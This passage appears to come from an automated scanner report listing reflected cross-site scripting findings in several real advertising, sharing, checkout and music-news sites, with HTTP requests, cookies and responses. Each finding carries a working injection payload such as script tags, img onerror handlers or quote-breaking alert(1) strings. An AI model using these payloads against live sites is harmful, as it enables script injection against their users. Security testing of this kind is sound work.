Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP200
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Fri, 06 May 02011 18:48:15 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 5918
Date: Mon, 09 May 2011 14:00:15 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 09-May-2011 16:46:55 GMT; Path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536156";var cwtagid="101378";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="7285e2be";alert(1)//bd79ae61eda";var ch="90";var cads="0";var cp="536156";var ct="101378";var cf="728X90";var cn="1";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1]
...[SNIP]...

3.80. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/page_parser.js [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tap-cdn.rubiconproject.com
Path:   /partner/scripts/rubicon/page_parser.js

Issue detail

The value of the d request parameter is copied into a JavaScript inline comment. The payload c1b45*/alert(1)//4e36c7fd6db was submitted in the d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/scripts/rubicon/page_parser.js?d=www.thevine.com.auc1b45*/alert(1)//4e36c7fd6db HTTP/1.1
Host: tap-cdn.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; rdk=7856/12590; ses2=12590^2&13549^1; csi2=3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680; cd=false

Response

HTTP/1.1 200 OK
Server: TRP Apache-Coyote/1.1
Last-Modified: Mon, 09 May 2011 14:07:09 GMT
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/javascript;charset=UTF-8
Cache-Control: max-age=3600
Expires: Mon, 09 May 2011 15:07:09 GMT
Date: Mon, 09 May 2011 14:07:09 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 17446


/*! Copyright 2009,2010 the Rubicon Project. All Rights Reserved. No permission is granted to use, copy or extend this code */


/*
   The requested resource (/oz/scripts/domains/com.auc1b45*/alert(1)//4e36c7fd6db/page_parser_hooks.js) is not available
*/


function oz_trim(A){return A.replace(/^\s+|\s+$/g,"");}function PageParser(){this.timeout=2000;this.doc=document;this.stopwords=null;this.init=function(
...[SNIP]...

3.81. http://wd.sharethis.com/api/getCount2.php [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 633ac<script>alert(1)</script>676868d91db was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/getCount2.php?cb=stButtons.processCB633ac<script>alert(1)</script>676868d91db&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 287

stButtons.processCB633ac<script>alert(1)</script>676868d91db({"url":"http:\/\/www.orlandosentinel.com\/business\/os-cfb-cover-casey-tv-20110509%2C0%2C6839926.story","email":9,"total":9,"ourl":"http:\/\/www.orlandosentinel.com\/business\/os-cfb-cover-casey-tv-20
...[SNIP]...

3.82. http://wd.sharethis.com/api/getCount2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b1d9d<img%20src%3da%20onerror%3dalert(1)>e9e0ca7772 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1d9d<img src=a onerror=alert(1)>e9e0ca7772 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.s/b1d9d<img%20src%3da%20onerror%3dalert(1)>e9e0ca7772tory HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 208

stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.orlandosentinel.com\/business\/os-cfb-cover-casey-tv-20110509,0,6839926.s\/b1d9d<img src=a onerror=alert(1)>e9e0ca7772tory"});

3.83. http://wd.sharethis.com/api/getCount2.php [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload d4b86<img%20src%3da%20onerror%3dalert(1)>9ec8cdb2a15 was submitted in the url parameter. This input was echoed as d4b86<img src=a onerror=alert(1)>9ec8cdb2a15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.storyd4b86<img%20src%3da%20onerror%3dalert(1)>9ec8cdb2a15 HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 207

stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.orlandosentinel.com\/business\/os-cfb-cover-casey-tv-20110509,0,6839926.storyd4b86<img src=a onerror=alert(1)>9ec8cdb2a15"});

3.84. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [evt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.surphace.com
Path:   /partner/omniture/sphereomni_api.php

Issue detail

The value of the evt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d439c"%3balert(1)//cf3d692bcc5 was submitted in the evt parameter. This input was echoed as d439c";alert(1)//cf3d692bcc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/omniture/sphereomni_api.php?siteid=tribune_orlandosentinel&evt=fireSphereOmInitActiond439c"%3balert(1)//cf3d692bcc5&omid=501482 HTTP/1.1
Host: widgets.surphace.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Machine: web22
Content-Type: text/html
x-forwarded-for: 173.193.214.243
Content-Length: 11103
Date: Mon, 09 May 2011 14:00:08 GMT
X-Varnish: 730031054
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<html>
<head>
<title>SphereOm Remote</title>


<script type="text/javascript" >
SPHEREOM = false;

// include Omniture
var sphere_account="aolsphere";


function doLoadTask(){
   //doRegisterSelf();
   if("fireSphereOmInitActiond439c";alert(1)//cf3d692bcc5" != ""){
       evtStr = "fireSphereOmInitActiond439c";alert(1)//cf3d692bcc5();";
       //alert("fire task: fireSphereOmInitActiond439c";alert(1)//cf3d692bcc5 ");
       try{
    eval(evtStr);
       }catch(anErr){

...[SNIP]...

3.85. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [evt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.surphace.com
Path:   /partner/omniture/sphereomni_api.php

Issue detail

The value of the evt request parameter is copied into a JavaScript rest-of-line comment. The payload d308d%0aalert(1)//a380428d17 was submitted in the evt parameter. This input was echoed as d308d
alert(1)//a380428d17
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/omniture/sphereomni_api.php?siteid=tribune_orlandosentinel&evt=fireSphereOmInitActiond308d%0aalert(1)//a380428d17&omid=501482 HTTP/1.1
Host: widgets.surphace.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Machine: web24
Content-Type: text/html
x-forwarded-for: 173.193.214.243
Content-Length: 11097
Date: Mon, 09 May 2011 14:00:09 GMT
X-Varnish: 730031142
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<html>
<head>
<title>SphereOm Remote</title>


<script type="text/javascript" >
SPHEREOM = false;

// include Omniture
var sphere_account="aolsphere";


function doLoadTask(){
   //doRegisterSelf();
   if("fireSphereOmInitActiond308d
alert(1)//a380428d17" != ""){
       evtStr = "fireSphereOmInitActiond308d
alert(1)//a380428d17();";
       //alert("fire task: fireSphereOmInitActiond308d
alert(1)//a380428d17
");
       try{
    eval(evtStr);
       }catch(anErr){
           //alert("Error: "+anErr.message + "Line: "+ ( anErr.number & 0xFFFF));
       }
   }
   
}


/*
// series of omniture methods

*/

// SphereOmniture.protot
...[SNIP]...

3.86. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.surphace.com
Path:   /partner/omniture/sphereomni_api.php

Issue detail

The value of the siteid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4550"%3balert(1)//1f690486bfe was submitted in the siteid parameter. This input was echoed as b4550";alert(1)//1f690486bfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/omniture/sphereomni_api.php?siteid=tribune_orlandosentinelb4550"%3balert(1)//1f690486bfe&evt=fireSphereOmInitAction&omid=501482 HTTP/1.1
Host: widgets.surphace.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Machine: web22
Content-Type: text/html
x-forwarded-for: 173.193.214.243
Content-Length: 11750
Date: Mon, 09 May 2011 14:02:24 GMT
X-Varnish: 877141020
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<html>
<head>
<title>SphereOm Remote</title>


<script type="text/javascript" >
SPHEREOM = false;

// include Omniture
var sphere_account="aolsphere";


function doLoadTask(){
   //doRegisterSelf();

...[SNIP]...
ilters="javascript:,surphace.com";
       s_265.trackExternalLinks="true";
       s_265.prop1="";
       s_265.prop2="";
       s_265.prop12="http://www.surphace.com";
       s_265.prop16="siteid : " + "tribune_orlandosentinelb4550";alert(1)//1f690486bfe";
       s_265.prop18="inline";
       s_265.prop19='tribune_orlandosentinelb4550";alert(1)//1f690486bfe_inline';
       s_265.products=';tribune_orlandosentinelb4550";alert(1)//1f690486bfe';
s_265.e
...[SNIP]...

3.87. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.surphace.com
Path:   /partner/omniture/sphereomni_api.php

Issue detail

The value of the siteid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a86a'%3balert(1)//f26baafc484 was submitted in the siteid parameter. This input was echoed as 2a86a';alert(1)//f26baafc484 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/omniture/sphereomni_api.php?siteid=tribune_orlandosentinel2a86a'%3balert(1)//f26baafc484&evt=fireSphereOmInitAction&omid=501482 HTTP/1.1
Host: widgets.surphace.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Machine: web25
Content-Type: text/html
x-forwarded-for: 173.193.214.243
Content-Length: 11747
Date: Mon, 09 May 2011 14:02:24 GMT
X-Varnish: 877141082
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<html>
<head>
<title>SphereOm Remote</title>


<script type="text/javascript" >
SPHEREOM = false;

// include Omniture
var sphere_account="aolsphere";


function doLoadTask(){
   //doRegisterSelf();

...[SNIP]...
.prop2="";
       s_265.prop12="http://www.surphace.com";
       s_265.prop16="siteid : " + "tribune_orlandosentinel2a86a';alert(1)//f26baafc484";
       s_265.prop18="inline";
       s_265.prop19='tribune_orlandosentinel2a86a';alert(1)//f26baafc484_inline';
       s_265.products=';tribune_orlandosentinel2a86a';alert(1)//f26baafc484';
s_265.events='prodview';
s_265.disablepihost=true;
s_265.mmxtitle="www
...[SNIP]...

3.88. https://www.ccnow.com/cgi-local/checkout.cgi [shipto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /cgi-local/checkout.cgi

Issue detail

The value of the shipto request parameter is copied into an HTML comment. The payload 8876a--><script>alert(1)</script>ba066ed09fe940fd1 was submitted in the shipto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /cgi-local/checkout.cgi?action=main&application=sc_cart&appscript=sc_cart.cgi&apptitle=CCNow+Shopping+Cart&auction=0&blocs=US&cids=asmakit&ftotal=1000%2C200%2C0%2C0&gtotal=1200&invoice=0&items=1&platflag=0&platform=Production&promo=0&returnurl=http%3A%2F%2Fasthmatickitty.com%2F&shipto=8876a--><script>alert(1)</script>ba066ed09fe940fd1&tkey=814744466213 HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Referer: https://www.ccnow.com/cgi-local/sc_cart.cgi
Cache-Control: max-age=0
Origin: https://www.ccnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oudelay=1304950012; __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.3.10.1304949980

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:08:21 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950101; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:08:21 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14627

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
<!-- shipmod: asmakit 8876a--><script>alert(1)</script>ba066ed09fe940fd1 BC:US -->
...[SNIP]...

3.89. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db195"><a>bdf495dcb29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /newsdb195"><a>bdf495dcb29/sufjan-stevens-suffered-nervous-breakdown HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:02:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=caeic5eid9f6nd9t57dlokn7u3; expires=Wed, 01-Jun-2011 17:35:50 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:02:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-newsdb195"><a>bdf495dcb29-sufjan-stevens-suffered-nervous-breakdown">
...[SNIP]...

3.90. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 772d1"><script>alert(1)</script>e9b4e9393e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/772d1"><script>alert(1)</script>e9b4e9393e8 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:15 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=vmgjs1vd6uc2gu9j83ucfc8851; expires=Wed, 01-Jun-2011 17:36:35 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:03:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 66077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=www.clashmusic.com/news/772d1"><script>alert(1)</script>e9b4e9393e8&amp;send=false&amp;layout=button_count&amp;width=100&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font=arial&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflo
...[SNIP]...

3.91. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 903eb"><img%20src%3da%20onerror%3dalert(1)>18c5063c5f6 was submitted in the REST URL parameter 2. This input was echoed as 903eb"><img src=a onerror=alert(1)>18c5063c5f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown903eb"><img%20src%3da%20onerror%3dalert(1)>18c5063c5f6 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
